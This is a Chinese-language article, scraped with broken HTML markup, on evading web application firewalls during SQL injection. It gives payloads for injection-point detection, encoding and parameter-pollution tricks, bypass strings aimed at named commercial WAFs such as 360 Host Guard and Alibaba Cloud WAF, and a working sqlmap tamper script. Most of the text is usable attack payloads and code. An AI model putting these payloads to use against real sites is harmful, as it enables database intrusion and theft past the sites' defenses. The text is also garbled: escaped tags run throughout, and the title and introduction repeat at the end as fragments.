SQL注入Fuzz Bypass WAF技术详解<\/h1>

0x00 前言<\/h2>
本文总结了SQL注入绕过WAF的各种技术方法，主要针对MySQL数据库，同时涵盖Access、MSSQL和Oracle等数据库的特性。内容包含注入点检测、WAF绕过技巧以及自动化实现方案。<\/p>

0x01 注入点检测<\/h2>

数据库识别技术<\/h3>

通过各数据库特有的函数可以识别数据库类型：<\/p>

Access<\/strong>: asc(), chr(), len()<\/li>
MySQL<\/strong>: substring(), substr(), length()<\/li>
MSSQL<\/strong>: char(), ascii(), len(), substring()<\/li>

Oracle<\/strong>: ascii(), chr(), length(), substr(), upper(), lower(), replace(x,old,new)<\/li> <\/ul>
通用检测方法：使用abs()<\/code>函数，如2-abs(1)<\/code>测试数字型注入。<\/p>
请求方式变换<\/h3> 不同脚本语言对HTTP请求方法的支持：<\/p> 语言<\/th> 支持方法<\/th> <\/tr> <\/thead> PHP<\/td> GET<\/td> <\/tr> ASPX<\/td> GET<\/td> <\/tr> ASP<\/td> GET, POST, COOKIE<\/td> <\/tr> JSP<\/td> GET, POST<\/td> <\/tr> <\/tbody> <\/table> 绕过技巧：<\/p> GET不如POST<\/li> POST不如multipart\/form-data<\/li> 使用Burp Suite的"Change Request Method"和"Change Body Encoding"功能<\/li> <\/ul> 数据库特性<\/h3> MySQL<\/strong>:<\/p> 注释符号：#<\/code>, -- <\/code>, \/* *\/<\/code><\/li> 字符串可以使用成对引号：'admin'<\/code> = admin'''<\/code><\/li> 空白符号：09<\/code>, 0A<\/code>, 0B<\/code>, 0C<\/code>, 0D<\/code>, A0<\/code>, 20<\/code><\/li> <\/ul> MSSQL<\/strong>:<\/p> 注释符号：--<\/code>, \/* *\/<\/code>, ;%00<\/code><\/li> 空白符号：01-20<\/code>范围内的各种控制字符<\/li> <\/ul> Oracle<\/strong>:<\/p> 注释符号：--<\/code>, \/* *\/<\/code><\/li> 空白符号：00<\/code>, 0A<\/code>, 0D<\/code>, 0C<\/code>, 09<\/code>, 20<\/code><\/li> 连接符：||<\/code>被当作字符串连接符<\/li> <\/ul> Web容器特性<\/h3> IIS+ASP(X)特性<\/strong>：<\/p> Unicode解析特性：<\/p> s%u006c%u0006ect<\/code> → select<\/code><\/li> %u0061nd 1=1<\/code><\/li> 多widechar可能转换为同一字符：s%u00f0lect<\/code> → select<\/code><\/li> <\/ul> <\/li> 百分号忽略特性：<\/p> sele%ct<\/code> → select<\/code><\/li> union selec%t user fr%om dd<\/code><\/li> <\/ul> <\/li> ASP\/ASP.NET请求解析：<\/p> 允许Content-Type: application\/x-www-form-urlencoded<\/code>方式提交<\/li> 使用request('id')<\/code>可能混淆GET\/POST<\/li> <\/ul> <\/li> <\/ol> PHP+Apache特性<\/strong>：<\/p> 畸形boundary：<\/p> PHP只识别boundary中逗号前的内容<\/li> 示例： Content-Type: multipart\/form-data; boundary=------,xxxx <\/code><\/pre> <\/li> <\/ul> <\/li> 畸形method：<\/p> 某些Apache版本会忽略HTTP方法名，始终返回GET内容<\/li> <\/ul> <\/li> <\/ol> Web应用层特性<\/h3> 双重URL编码：服务器解码后应用层再次解码<\/li> 统一参数获取方式： PHP的$_REQUEST<\/code>可能从COOKIE获取参数<\/li> 尝试从不同位置提交参数（GET\/POST\/COOKIE）<\/li> <\/ul> <\/li> form-data提交方式：当URL编码方式被过滤时，尝试使用form-data<\/li> <\/ul> <\/li> <\/ol> HPP(HTTP参数污染)<\/h3> 不同环境处理多个同名参数的方式：<\/p> 环境<\/th> 处理方式<\/th> <\/tr> <\/thead> ASP.NET + IIS<\/td> 取最后一个<\/td> <\/tr> ASP + IIS<\/td> 取最后一个<\/td> <\/tr> PHP + Apache<\/td> 取最后一个<\/td> <\/tr> JSP + Tomcat<\/td> 取第一个<\/td> <\/tr> <\/tbody> <\/table> 0x02 WAF绕过技术<\/h2> 主流WAF绕过案例<\/h3> 百度云加速<\/strong>：<\/p> 绕过select<\/code>关键字： union--+aaaaaa%0a <\/code><\/pre> <\/li> <\/ul> 360主机卫士<\/strong>：<\/p> 使用注释和换行： %23%0aand%230a1=1 <\/code><\/pre> <\/li> 大字符串fuzz： %23-FUZZ-%0a <\/code><\/pre> <\/li> <\/ul> 云锁<\/strong>：<\/p> 内联注释： union\/*!\/*!select%201,2,3*\/ <\/code><\/pre> <\/li> 转换为multipart\/form-data提交<\/li> <\/ul> 安全狗<\/strong>：<\/p> 直接尝试或使用chunked编码提交<\/li> <\/ul> 阿里云WAF<\/strong>：<\/p> 自定义变量绕过： @a:=(select @b:= table_name from{a information_schema.TABLES}limit 0,1) <\/code><\/pre> <\/li> 特殊注释： union%23aa%0a\/!select--%01%0a\/1,@$,3 <\/code><\/pre> <\/li> <\/ul> 通用绕过技巧<\/h3> 注释干扰：<\/p> MySQL特有注释：\/*!50000select*\/<\/code><\/li> 随机注释：sel\/*xyz*\/ect<\/code><\/li> <\/ul> <\/li> 空白符干扰：<\/p> 使用各种空白字符（制表符、换行等）<\/li> 不同数据库支持的空白符不同<\/li> <\/ul> <\/li> 大小写\/编码变换：<\/p> 混合大小写：SeLeCt<\/code><\/li> URL编码：%53%45%4C%45%43%54<\/code><\/li> Unicode编码：%u0053%u0045%u004C%u0045%u0043%u0054<\/code><\/li> <\/ul> <\/li> 等价函数\/语法替换：<\/p> concat()<\/code> → concat_ws()<\/code><\/li> substring()<\/code> → mid()<\/code>, substr()<\/code><\/li> <\/ul> <\/li> 分块传输编码：<\/p> 使用Transfer-Encoding: chunked<\/li> <\/ul> <\/li> 超长字符串干扰：<\/p> 某些WAF对超长字符串处理存在缺陷<\/li> <\/ul> <\/li> <\/ol> 0x03 自动化实现<\/h2> SQLMap Tamper脚本示例<\/h3> 针对360主机卫士的Tamper脚本：<\/p> from<\/span> lib.core.enums import<\/span> PRIORITY <\/span><\/span>from<\/span> lib.core.settings import<\/span> UNICODE_ENCODING <\/span><\/span> <\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>LOW <\/span><\/span> <\/span><\/span>def<\/span> dependencies<\/span>(): <\/span><\/span> pass<\/span> <\/span><\/span> <\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs): <\/span><\/span> """ <\/span><\/span><\/span> 替换关键字的Tamper脚本 <\/span><\/span><\/span> """<\/span> <\/span><\/span> if<\/span> payload: <\/span><\/span> payload =<\/span> payload.<\/span>replace("UNION ALL SELECT"<\/span>, "union%23!@%23$<\/span>%%<\/span>5e<\/span>%26%<\/span>2a()%60~<\/span>%0a<\/span>\/*!12345select*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace("UNION SELECT"<\/span>, "union%23!@%23$<\/span>%%<\/span>5e<\/span>%26%<\/span>2a()%60~<\/span>%0a<\/span>\/*!12345select*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace(" FROM "<\/span>, "\/*!%23!@%23$<\/span>%%<\/span>5e<\/span>%26%<\/span>2a()%60~<\/span>%0a<\/span>frOm*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace("CONCAT"<\/span>, "\/*!12345CONCAT*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace("CAST("<\/span>, "\/*!12345CAST(*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace("CASE"<\/span>, "\/*!12345CASE*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace("DATABASE()"<\/span>, "database()"<\/span>) <\/span><\/span> return<\/span> payload <\/span><\/span><\/code><\/pre>Fuzz测试方法<\/h3> 使用大字符串列表进行fuzz：<\/p> 参考：https:\/\/github.com\/minimaxir\/big-list-of-naughty-strings<\/li> <\/ul> <\/li> 数字型注释fuzz：<\/p> 测试范围：1w-5w，以500为步长<\/li> 示例：\/*!12345select*\/<\/code><\/li> <\/ul> <\/li> 特殊字符组合：<\/p> 测试各种特殊字符组合：%23!@%23$%%5e%26%2a()%60~<\/code><\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> WAF绕过技术文章：<\/p> http:\/\/drops.xmd5.com\/static\/drops\/tips-7883.html<\/li> https:\/\/xianzhi.aliyun.com\/forum\/attachment\/big_size\/wafbypass_sql.pdf<\/li> <\/ul> <\/li> SQL注入手册：<\/p> http:\/\/www.sqlinjectionwiki.com\/categories\/2\/mysql-sql-injection-cheat-sheet\/<\/li> https:\/\/www.owasp.org\/index.php\/SQL_Injection_Bypassing_WAF<\/li> <\/ul> <\/li> Nginx Lua WAF绕过：<\/p> https:\/\/joychou.org\/web\/nginx-Lua-waf-general-bypass-method.html<\/li> <\/ul> <\/li> 其他资源：<\/p> https:\/\/websec.ca\/kb\/sql_injection#MySQL_Comment_Out_Query<\/li> https:\/\/forum.bugcrowd.com\/t\/sqlmap-tamper-scripts-sql-injection-and-waf-bypass\/423<\/li> <\/ul> <\/li> <\/ol>

SQL注入Fuzz Bypass WAF技术详解<\/h1>

0x00 前言<\/h2> 本文总结了SQL注入绕过WAF的各种技术方法，主要针对MySQL数据库，同时涵盖Access、MSSQL和Oracle等数据库的特性。内容包含注入点检测、WAF绕过技巧以及自动化实现方案。<\/p>

0x01 注入点检测<\/h2>

0x02 WAF绕过技术<\/h2>

0x03 自动化实现<\/h2>

0x00 前言<\/h2>
本文总结了SQL注入绕过WAF的各种技术方法，主要针对MySQL数据库，同时涵盖Access、MSSQL和Oracle等数据库的特性。内容包含注入点检测、WAF绕过技巧以及自动化实现方案。<\/p>